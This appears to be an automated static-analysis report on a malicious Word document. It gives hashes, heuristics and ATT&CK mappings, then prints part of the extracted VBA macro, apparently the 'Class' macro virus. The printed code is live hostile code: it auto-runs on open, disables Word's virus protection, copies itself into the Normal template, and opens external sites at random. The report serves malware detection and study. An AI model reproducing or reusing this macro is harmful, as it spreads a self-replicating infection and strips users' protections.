Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7c696fb40819ae1d…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 36.5 KB
Created: 1998-11-06 07:51:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14

MD5: a93f98ffb650b6919e2ddb13e31b948a
SHA-1: 01b83ddf5a45132e18526164f49af385bc1e855f
SHA-256: 7c696fb40819ae1de8d5dd075dce5c59915e85829aade24efbd3f3ca375f5988

Risk score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file contains legacy WordBasic macro-virus markers as well as VBA macros, including AutoOpen and Auto_Close procedures, indicating intent to execute code automatically when the document is opened or closed. The embedded VBA script attempts to disable Word's virus protection and alter macro-related settings, which suggests it is designed to download and execute a secondary payload. The presence of several embedded URLs, some unknown and some benign, further supports the downloader hypothesis.

Heuristics (6)

  • ClamAV: Doc.Trojan.Class-36 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Class-36
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium, 2 related findings, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro (runs automatically when the document is opened)
  • Auto_Close macro (severity: high, rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro (runs automatically when the document is closed)
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in document text (OLE body):
      • http://www.cannabisculture.com
      • http://www.Microsoft.com

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 23636 bytes
SHA-256: e2f4b7af13b2d5497211f1cbae86f395557dc687107b4b6efb55426d22f091b1
Detection: ClamAV: Doc.Trojan.Class-29
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'81376636814662431524813766368146624315248137663681466243152481376636814662431524
Randomize
'13795058788950044821849137950587889500448218491379505878895004482184913795058788950044821849
x = 0: o = 0
'1113316648962304576036111331664896230457603611133166489623045760361113316648962304576036
On Error GoTo 93
'1116044344947024789904111604434494702478990411160443449470247899041116044344947024789904
Options.VirusProtection = False
'478199910423045061636478199910423045061636478199910423045061636478199910423045061636
Options.SaveNormalPrompt = False
'952024854012117472256952024854012117472256952024854012117472256952024854012117472256
Options.ConfirmConversions = False
'992892673651208974436992892673651208974436992892673651208974436992892673651208974436
fx = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'3154353602516682047281315435360251668204728131543536025166820472813154353602516682047281
xf = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'1456680024929181180625145668002492918118062514566800249291811806251456680024929181180625
If xf > 96 And fx > 0 Then GoTo 93
'6512959202532271607449651295920253227160744965129592025322716074496512959202532271607449
If xf < 96 Then
'4685363284921777790329468536328492177779032946853632849217777903294685363284921777790329
    Set xs = NormalTemplate.VBProject.VBComponents.Item(1)
'1884662208923522663641188466220892352266364118846622089235226636411884662208923522663641
    ActiveDocument.VBProject.VBComponents.Item(1).Name = xs.Name
'107439728420437561600107439728420437561600107439728420437561600107439728420437561600
    ActiveDocument.VBProject.VBComponents.Item(1).Export Application.StartupPath & Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(73) + Chr(73)
'1042230828965712336400104223082896571233640010422308289657123364001042230828965712336400
End If
'50717186563576040000507171865635760400005071718656357604000050717186563576040000
If fx = 0 Then Set xs = ActiveDocument.VBProject.VBComponents.Item(1)
'1550896622526391951936155089662252639195193615508966225263919519361550896622526391951936
k = Int(Rnd(1) * 100) + 1
'6561026102510869730564656102610251086973056465610261025108697305646561026102510869730564
If k = 99 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.cannabisculture.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(47) + Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(73) + Chr(73)
'154313537293393878049154313537293393878049154313537293393878049154313537293393878049
l = Int(Rnd(1) * 75) + 1
'478795665962752261444478795665962752261444478795665962752261444478795665962752261444
If l = 74 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.Microsoft.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(47) + Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(73) + Chr(73)
'81527380900335878929815273809003358789298152738090033587892981527380900335878929
m = Int(Rnd(1) * 50) + 1
'746133164151586674129746133164151586674129746133164151586674129746133164151586674129
If m = 49 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(82) + Chr(79) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
'35129255184799984656351292551847999846563512925518479998465635129255184799984656
n = Int(Rnd(1) * 25) + 1
'The GeniusTrueFalse8.0.5622c:\program files\microsoft office\office\startupBooklist.doc8.0b
If n = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(32) + Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(32) + Chr(73) + Chr(73)

... (truncated)